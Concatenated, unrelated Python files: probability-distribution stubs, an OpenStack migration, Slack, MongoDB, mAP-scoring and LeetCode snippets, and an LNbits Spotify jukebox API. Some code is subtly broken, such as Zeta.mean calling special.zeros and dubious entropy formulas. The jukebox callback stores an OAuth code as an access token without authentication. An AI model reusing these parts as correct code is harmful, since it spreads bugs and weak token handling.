den = pow(self.shape - 1, 2) * (self.shape - 2)
return num / den
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.xmin * pow(2, self.shape)
def entropy(self) -> float:
A = self.xmin / self.shape
B = np.exp(1 + 1 / self.shape)
return np.log(A * B)
def support(self) -> ContinuousInterval:
return ContinuousInterval(self.xmin, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Lomax(ContinuousDistribution):
def __init__(self, shape, scale) -> None:
self.shape = shape
self.scale = scale
def mean(self) -> float:
if self.shape > 1:
return self.scale / (self.shape - 1)
return np.nan
def var(self) -> float:
if self.shape <= 1:
return np.nan
elif self.shape <= 2:
return np.inf
A = pow(self.scale, 2) * self.shape
B = pow(self.shape - 1, 2) * (self.shape - 2)
return A / B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.scale * (pow(2, 1 / self.shape) - 1)
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class LogNormal(ContinuousDistribution):
def __init__(self, mean, std) -> None:
self.mean_ = mean
self.std_ = std
def mean(self) -> float:
return np.exp(self.mean_ + pow(self.std_, 2) / 2)
def var(self) -> float:
A = np.exp(pow(self.std_, 2)) - 1
B = np.exp(2 * self.mean_ + pow(self.std_, 2))
return A * B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return np.exp(self.mean_)
def entropy(self) -> float:
A = self.std_ * pow(2 * np.pi, 0.5) * np.exp(self.mean_ + 0.5)
return np.log(A) / np.log(2)
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Weibull(ContinuousDistribution):
def __init__(self, scale, shape) -> None:
self.scale = scale
self.shape = shape
def mean(self) -> float:
return self.scale * special.gamma(1 + 1 / self.shape)
def var(self) -> float:
A = special.gamma(1 + 2 / self.shape)
B = special.gamma(1 + 1 / self.shape)
return pow(self.scale, 2) * (A - pow(B, 2))
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.scale * pow(np.log(2), 1 / self.shape)
def entropy(self) -> float:
A = np.euler_gamma * (1 - 1 / self.shape)
B = np.log(self.scale / self.shape)
return A + B + 1
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Gamma(ContinuousDistribution):
def __init__(self, alpha, beta) -> None:
self.alpha = alpha
self.beta = beta
def mean(self) -> float:
return self.alpha / self.beta
def var(self) -> float:
return self.alpha / pow(self.beta, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
A = self.alpha - np.log(self.beta) + special.gammaln(self.alpha)
B = (1 - self.alpha) * special.digamma(self.alpha)
return A + B
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class ChiSquare(ContinuousDistribution):
def __init__(self, k) -> None:
self.k = k
def mean(self) -> float:
return self.k
def var(self) -> float:
return 2 * self.k
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
A = self.k / 2 + np.log(2 * special.gamma(self.k / 2))
B = (1 - self.k / 2) * special.digamma(self.k / 2)
return A + B
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Beta(ContinuousDistribution):
def __init__(self, alpha, beta) -> None:
self.alpha = alpha
self.beta = beta
def mean(self) -> float:
return self.alpha / (self.alpha + self.beta)
def var(self) -> float:
A = self.alpha * self.beta
B = pow(self.alpha + self.beta, 2) * (self.alpha + self.beta + 1)
return A / B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
A = special.betaln(self.alpha, self.beta)
B = (self.alpha - 1) * special.digamma(self.alpha)
C = (self.beta - 1) * special.digamma(self.beta)
D = (self.alpha + self.beta - 2) * \
special.digamma(self.alpha + self.beta)
return A - B - C + D
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, 1)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Bernoulli(DiscreteDistribution):
def __init__(self, p) -> None:
self.p = p
def mean(self) -> float:
return self.p
def var(self) -> float:
return self.p * (1 - self.p)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
if self.p < 0.5:
return 0
elif self.p > 0.5:
return 1
return self.p
def entropy(self) -> float:
return -((1 - self.p) * np.log(1 - self.p) + self.p * np.log(self.p))
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, 1)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Binomial(DiscreteDistribution):
def __init__(self, p, n) -> None:
self.p = p
self.n = n
def mean(self) -> float:
return self.p * self.n
def var(self) -> float:
return self.p * (1 - self.p) * self.n
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.mean()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, self.n)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Hypergeometric(DiscreteDistribution):
def __init__(self, n, N, K) -> None:
self.n = n
self.N = N
self.K = K
def mean(self) -> float:
return self.n * self.K / self.N
def var(self) -> float:
A = self.n * self.K / self.N
B = (self.N - self.K) / self.N
C = (self.N - self.n) / (self.N - 1)
return A * B * C
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(max(0, self.n + self.K - self.N), min(self.n, self.K))
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Geometric(DiscreteDistribution):
def __init__(self, p) -> None:
self.p = p
def mean(self) -> float:
return (1 - self.p) / self.p
def var(self) -> float:
return (1 - self.p) / pow(self.p, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
A = -1 / np.log2(1 - self.p)
return A - 1
def entropy(self) -> float:
return -((1 - self.p) * np.log(1 - self.p) + self.p * np.log(self.p)) / self.p
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Poisson(DiscreteDistribution):
def __init__(self, rate) -> None:
self.rate = rate
def mean(self) -> float:
return self.rate
def var(self) -> float:
return self.rate
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class ZeroInflatedPoisson(DiscreteDistribution):
def __init__(self, rate, p) -> None:
self.rate = rate
self.p = p
def mean(self) -> float:
return (1 - self.p) * self.rate
def var(self) -> float:
return self.rate * (1 - self.p) * (1 + self.p * self.rate)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class NegativeBinomial(DiscreteDistribution):
def __init__(self, p, r) -> None:
self.p = p
self.r = r
def mean(self) -> float:
return self.p * self.r / (1 - self.p)
def var(self) -> float:
return self.p * self.r / pow(1 - self.p, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class NegativeHypergeometric(DiscreteDistribution):
def __init__(self, r, N, K) -> None:
self.r = r
self.N = N
self.K = K
def mean(self) -> float:
return self.r * self.K / (self.N - self.K + 1)
def var(self) -> float:
num = self.r * (self.N + 1) * self.K
den = (self.N - self.K + 1) * (self.N - self.K + 2)
A = num / den
B = 1 - self.r / (self.N - self.K + 1)
return A * B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, self.K)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Zeta(DiscreteDistribution):
def __init__(self, shape) -> None:
self.shape = shape
def mean(self) -> float:
if self.shape > 2:
return special.zeta(self.shape - 1) / special.zeros(self.shape)
raise NotImplementedError()
def var(self) -> float:
if self.shape > 3:
A = special.zeta(self.shape)
B = special.zeta(self.shape - 2)
C = pow(special.zeta(self.shape - 1), 2)
return (A * B - C) / pow(A, 2)
raise NotImplementedError()
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
|
"""Logging tools and PII scrubber."""
|
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""ha_for_routing_service_in_cisco_devices
Revision ID: 1e9e22602685
Revises: 53f08de0523f
Create Date: 2015-09-28 09:33:27.294138
"""
# revision identifiers, used by Alembic.
revision = '1e9e22602685'
down_revision = '2921fe565328'
from alembic import op
import sqlalchemy as sa
from networking_cisco.plugins.cisco.extensions import ha
ha_states = sa.Enum('ACTIVE', 'STANDBY', name='ha_states')
def upgrade():
op.create_table('cisco_router_ha_settings',
sa.Column('router_id', sa.String(36), nullable=True),
sa.Column('ha_type', sa.String(255), nullable=True),
sa.Column('redundancy_level', sa.Integer,
server_default=str(ha.MIN_REDUNDANCY_LEVEL)),
sa.Column('priority', sa.Integer, nullable=True),
sa.Column('probe_connectivity', sa.Boolean, nullable=True),
sa.Column('probe_target', sa.String(64), nullable=True),
sa.Column('probe_interval', sa.Integer, nullable=True),
sa.Column('state', ha_states, server_default='ACTIVE'),
sa.ForeignKeyConstraint(['router_id'], ['routers.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('router_id')
)
op.create_table('cisco_router_ha_groups',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('ha_type', sa.String(255), nullable=True),
sa.Column('group_identity', sa.String(255), nullable=True),
sa.Column('ha_port_id', sa.String(36), nullable=False),
sa.Column('extra_port_id', sa.String(36), nullable=True),
sa.Column('subnet_id', sa.String(36), nullable=True),
sa.Column('user_router_id', sa.String(36), nullable=True),
sa.Column('timers_config', sa.String(255), nullable=True),
sa.Column('tracking_config', sa.String(255), nullable=True),
sa.Column('other_config', sa.String(255), nullable=True),
sa.ForeignKeyConstraint(['ha_port_id'], ['ports.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['extra_port_id'], ['ports.id'],
ondelete='SET NULL'),
sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id']),
sa.ForeignKeyConstraint(['user_router_id'], ['routers.id']),
sa.PrimaryKeyConstraint('ha_port_id')
)
op.create_table('cisco_router_redundancy_bindings',
sa.Column('redundancy_router_id', sa.String(36)),
sa.Column('priority', sa.Integer),
sa.Column('state', ha_states, server_default='STANDBY'),
sa.Column('user_router_id', sa.String(36)),
sa.ForeignKeyConstraint(['redundancy_router_id'], ['routers.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_router_id'], ['routers.id']),
sa.PrimaryKeyConstraint('redundancy_router_id')
)
|
import numpy as np
def R_cam_imu_matrix():
# IMU origo/pos given in camera coordinate
imuOrigo_cam = np.array([0.71, 1.34, -3.53])
print("See geogebra sketch\n")
# Rotation matrix to rotation IMU to camera
# First rotate yaw of 8.303 degrees
def R_z(yaw_deg):
y = yaw_deg * np.pi / 180
return np.array([
[np.cos(y), -np.sin(y), 0],
[np.sin(y), np.cos(y), 0],
[0, 0, 1]])
R_zxy_xyz = np.array([
[0, 1, 0],
[0, 0, 1],
[1, 0, 0]])
print("Array x vector given in IMU, this can be ferries forward acceleration:\t", end="")
xVec_imu = np.array([3.60000, 0.10000, -1.3400]) # camera origo given in imu
print(xVec_imu)
R_cam_imu = R_zxy_xyz @ R_z(-13)
print("Same vector given in camera: \t\t\t\t\t\t", end="")
print(R_cam_imu @ xVec_imu)
print("Use this to rotate IMU acc data and euler angles")
# RTK origo given in IMU
rtkOrigo_imu = np.array([-0.025, 0.1, 0.06])
print("Assume that they have same origo, too small offset")
return R_cam_imu, rtkOrigo_imu, R_zxy_xyz
|
from procedural.calculadora import calcular, calcular_prefixa
if __name__ == '__main__':
print(calcular()) # infixa
print(calcular_prefixa())
|
from slacky.attachment import SlackAttachment
from slacky.base import SlackObject
from .sender import SlackMessageSender
class SlackMessage(SlackObject):
def __init__(self, text=None, attachments=None):
self.text = text or ''
self.attachments = attachments or []
def send(self, channel, token):
sender = SlackMessageSender(token)
return sender.send(self, channel)
def send_ephemeral(self, channel, user_id, token):
sender = SlackMessageSender(token)
return sender.send_ephemeral(self, channel, user_id)
def update(self, channel, ts, token):
sender = SlackMessageSender(token)
return sender.update(self, channel, ts)
def delete(self, channel, ts, token):
sender = SlackMessageSender(token)
return sender.delete(channel, ts)
def get_text(self):
return self.text
def get_attachments(self):
return [
a.as_dict() for a in self.attachments
]
def copy(self):
pass
@classmethod
def from_dict(cls, message_dict):
m = message_dict.copy()
m['attachments'] = []
for a in message_dict['attachments']:
m['attachments'].append(SlackAttachment.from_dict(a))
return cls(**m)
def as_dict(self):
return {
'text': self.get_text(),
'attachments': [a.as_dict() for a in self.attachments]
}
|
import os
import pandas as pd
import numpy as np
import torch
import random
from HPAutils import *
import cv2
import imgaug as ia
from imgaug import augmenters as iaa
ia.seed(0)
import sys
def mAP(PREDS='', DATASET='custom', XLS=True, return_details=False):
#ROOT = 'D:\\HPA\\test'
if XLS:
truthpaths = {'custom': 'F:\\probabilities_truth_custom.csv',
'custom512': 'F:\\todo'}
else:
truthpaths = {'custom': 'X:\\truth_submission.csv',
'custom512': 'F:\\TestFiles512\\truth_submission.csv'}
TRUTH = truthpaths[DATASET]
truth = pd.read_csv(TRUTH).to_numpy()
if isinstance(PREDS, str):
preds = pd.read_csv(PREDS).to_numpy()
else:
preds = PREDS
if XLS:
assert(np.array_equal(truth[:,0:2], preds[:,0:2]))
stats = []
if XLS:
for truth_row, pred_row in zip(truth, preds):
for i in range(2, len(pred_row)):
if truth_row[i] == 1.0:
stats.append([i-2, 1, pred_row[i]])
else:
stats.append([i-2, 0, pred_row[i]])
else:
for truth_row, pred_row in zip(truth, preds):
bits = truth_row[3].split(' ')
p_bits = pred_row[3].split(' ')
assert(len(bits) % 3 == 0)
assert(len(bits) == len(p_bits))
for i, bit, p_bit in zip(range(0, len(bits)), bits, p_bits):
if i % 3 == 0:
label = int(bit)
if i % 3 == 1:
value = float(bit)
prob = float(p_bit)
if i % 3 == 2:
# Determine value of prediction
if value == 1.0: # True
stats.append([label, 1, prob])
else:
stats.append([label, 0, prob])
# Get all of the confidence data into a dataframe
stats_df = pd.DataFrame(data=stats, columns=['Label', 'State', 'Confidence'])
sorted = stats_df.sort_values(by='Confidence', ascending=True)
aucs = []
for label in range(0, len(LBL_NAMES)):
lbl_stats = sorted.loc[sorted['Label'] == label].values
# True positives starts at the number of total positives and decreases from there
precision = 0.0
max_precision = 0.0
recall = 1.0
old_recall = 1.0
old_precision = 0.0
prior_confidence = 0.0
auc = 0.0
unique, indices = np.unique(ar=lbl_stats[:, 2], return_index=True)
for conf, idx in zip(unique, indices):
tp = lbl_stats[idx:, 1].sum()
fn = lbl_stats[:idx, 1].sum()
fp = (len(lbl_stats) - idx) - tp
# Calc new precision recall values
recall = float(tp) / float(tp + fn)
precision = float(tp) / float(tp + fp)
if recall < old_recall:
if precision < max_precision: # Should check for change in recall value in order to update the max
precision = max_precision
else:
max_precision = precision
# Increment AUC
# Rectangle portion
rect = old_precision * (old_recall - recall)
auc += rect
# Triangle portion
triangle = 0.5 * (precision - old_precision) * (old_recall - recall)
auc += triangle
old_recall = recall
old_precision = precision
# Do final (0, 1) point
rect = old_precision * old_recall
auc += rect
# Triangle portion
triangle = 0.5 * (1 - old_precision) * (old_recall - recall)
auc += triangle
if not return_details:
print('AUC for Label ' + str(label) + ": " + "{0:.1%}".format(auc))
aucs.append(auc)
print("mAP Score: " + "{0:.2%}".format(np.average(np.array(aucs))))
return aucs
if __name__ == '__main__':
print('%s: calling main function ... \n' % os.path.basename(__file__))
mAP()
print('\nsuccess!')
|
from typing import NewType
from motor.motor_asyncio import AsyncIOMotorClient
from chat_room.core.config import settings as s
DBClient = NewType("DBClient", AsyncIOMotorClient)
class DataBase:
client: DBClient = None
db = DataBase()
async def get_database() -> DBClient:
return db.client
async def connect_to_database():
db.client = AsyncIOMotorClient(
s.MONGODB_URL,
maxPoolSize=s.MAX_CONNECTIONS_COUNT,
minPoolSize=s.MIN_CONNECTIONS_COUNT,
)
async def close_database_connection():
db.client.close()
|
class Solution:
def maximumProduct(self, nums):
nums.sort()
a, b, c = nums[:3] # 前三个
e, d, f = nums[-3:] # 后三个
return max(e * d * f, a * b * f)
slu = Solution()
print(slu.maximumProduct([1, 2, 2, 3]))
|
import base64
import json
from http import HTTPStatus
import httpx
from fastapi import Request
from fastapi.param_functions import Query
from fastapi.params import Depends
from starlette.exceptions import HTTPException
from starlette.responses import HTMLResponse # type: ignore
from lnbits.core.services import create_invoice
from lnbits.core.views.api import api_payment
from lnbits.decorators import WalletTypeInfo, require_admin_key
from . import jukebox_ext
from .crud import (
create_jukebox,
create_jukebox_payment,
delete_jukebox,
get_jukebox,
get_jukebox_payment,
get_jukeboxs,
update_jukebox,
update_jukebox_payment,
)
from .models import CreateJukeboxPayment, CreateJukeLinkData
@jukebox_ext.get("/api/v1/jukebox")
async def api_get_jukeboxs(
req: Request,
wallet: WalletTypeInfo = Depends(require_admin_key),
all_wallets: bool = Query(False),
):
wallet_user = wallet.wallet.user
try:
jukeboxs = [jukebox.dict() for jukebox in await get_jukeboxs(wallet_user)]
return jukeboxs
except:
raise HTTPException(status_code=HTTPStatus.NO_CONTENT, detail="No Jukeboxes")
##################SPOTIFY AUTH#####################
@jukebox_ext.get("/api/v1/jukebox/spotify/cb/{juke_id}", response_class=HTMLResponse)
async def api_check_credentials_callbac(
juke_id: str = Query(None),
code: str = Query(None),
access_token: str = Query(None),
refresh_token: str = Query(None),
):
sp_code = ""
sp_access_token = ""
sp_refresh_token = ""
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(detail="No Jukebox", status_code=HTTPStatus.FORBIDDEN)
if code:
jukebox.sp_access_token = code
jukebox = await update_jukebox(jukebox, juke_id=juke_id)
if access_token:
jukebox.sp_access_token = access_token
jukebox.sp_refresh_token = refresh_token
jukebox = await update_jukebox(jukebox, juke_id=juke_id)
return "<h1>Success!</h1><h2>You can close this window</h2>"
@jukebox_ext.get("/api/v1/jukebox/{juke_id}")
async def api_check_credentials_check(
juke_id: str = Query(None), wallet: WalletTypeInfo = Depends(require_admin_key)
):
jukebox = await get_jukebox(juke_id)
return jukebox
@jukebox_ext.post("/api/v1/jukebox", status_code=HTTPStatus.CREATED)
@jukebox_ext.put("/api/v1/jukebox/{juke_id}", status_code=HTTPStatus.OK)
async def api_create_update_jukebox(
data: CreateJukeLinkData,
juke_id: str = Query(None),
wallet: WalletTypeInfo = Depends(require_admin_key),
):
if juke_id:
jukebox = await update_jukebox(data, juke_id=juke_id)
else:
jukebox = await create_jukebox(data, inkey=wallet.wallet.inkey)
return jukebox
@jukebox_ext.delete("/api/v1/jukebox/{juke_id}")
async def api_delete_item(
juke_id=None, wallet: WalletTypeInfo = Depends(require_admin_key)
):
await delete_jukebox(juke_id)
try:
return [{**jukebox} for jukebox in await get_jukeboxs(wallet.wallet.user)]
except:
raise HTTPException(status_code=HTTPStatus.NO_CONTENT, detail="No Jukebox")
################JUKEBOX ENDPOINTS##################
######GET ACCESS TOKEN######
@jukebox_ext.get("/api/v1/jukebox/jb/playlist/{juke_id}/{sp_playlist}")
async def api_get_jukebox_song(
juke_id: str = Query(None),
sp_playlist: str = Query(None),
retry: bool = Query(False),
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No Jukeboxes")
tracks = []
async with httpx.AsyncClient() as client:
try:
r = await client.get(
"https://api.spotify.com/v1/playlists/" + sp_playlist + "/tracks",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if "items" not in r.json():
if r.status_code == 401:
token = await api_get_token(juke_id)
if token == False:
return False
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Failed to get auth",
)
else:
return await api_get_jukebox_song(
juke_id, sp_playlist, retry=True
)
return r
for item in r.json()["items"]:
tracks.append(
{
"id": item["track"]["id"],
"name": item["track"]["name"],
"album": item["track"]["album"]["name"],
"artist": item["track"]["artists"][0]["name"],
"image": item["track"]["album"]["images"][0]["url"],
}
)
except:
something = None
return [track for track in tracks]
async def api_get_token(juke_id=None):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No Jukeboxes")
async with httpx.AsyncClient() as client:
try:
r = await client.post(
"https://accounts.spotify.com/api/token",
timeout=40,
params={
"grant_type": "refresh_token",
"refresh_token": jukebox.sp_refresh_token,
"client_id": jukebox.sp_user,
},
headers={
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "Basic "
+ base64.b64encode(
str(jukebox.sp_user + ":" + jukebox.sp_secret).encode("ascii")
).decode("ascii"),
"Content-Type": "application/x-www-form-urlencoded",
},
)
if "access_token" not in r.json():
return False
else:
jukebox.sp_access_token = r.json()["access_token"]
await update_jukebox(jukebox, juke_id=juke_id)
except:
something = None
return True
######CHECK DEVICE
@jukebox_ext.get("/api/v1/jukebox/jb/{juke_id}")
async def api_get_jukebox_device_check(
juke_id: str = Query(None), retry: bool = Query(False)
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No Jukeboxes")
async with httpx.AsyncClient() as client:
rDevice = await client.get(
"https://api.spotify.com/v1/me/player/devices",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if rDevice.status_code == 204 or rDevice.status_code == 200:
return json.loads(rDevice.text)
elif rDevice.status_code == 401 or rDevice.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="No devices connected"
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Failed to get auth"
)
else:
return api_get_jukebox_device_check(juke_id, retry=True)
else:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="No device connected"
)
######GET INVOICE STUFF
@jukebox_ext.get("/api/v1/jukebox/jb/invoice/{juke_id}/{song_id}")
async def api_get_jukebox_invoice(juke_id, song_id):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
try:
devices = await api_get_jukebox_device_check(juke_id)
deviceConnected = False
for device in devices["devices"]:
if device["id"] == jukebox.sp_device.split("-")[1]:
deviceConnected = True
if not deviceConnected:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="No device connected"
)
except:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="No device connected"
)
invoice = await create_invoice(
wallet_id=jukebox.wallet,
amount=jukebox.price,
memo=jukebox.title,
extra={"tag": "jukebox"},
)
payment_hash = invoice[0]
data = CreateJukeboxPayment(
invoice=invoice[1], payment_hash=payment_hash, juke_id=juke_id, song_id=song_id
)
jukebox_payment = await create_jukebox_payment(data)
return data
@jukebox_ext.get("/api/v1/jukebox/jb/checkinvoice/{pay_hash}/{juke_id}")
async def api_get_jukebox_invoice_check(
pay_hash: str = Query(None), juke_id: str = Query(None)
):
try:
await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
try:
status = await api_payment(pay_hash)
if status["paid"]:
await update_jukebox_payment(pay_hash, paid=True)
return {"paid": True}
except:
return {"paid": False}
return {"paid": False}
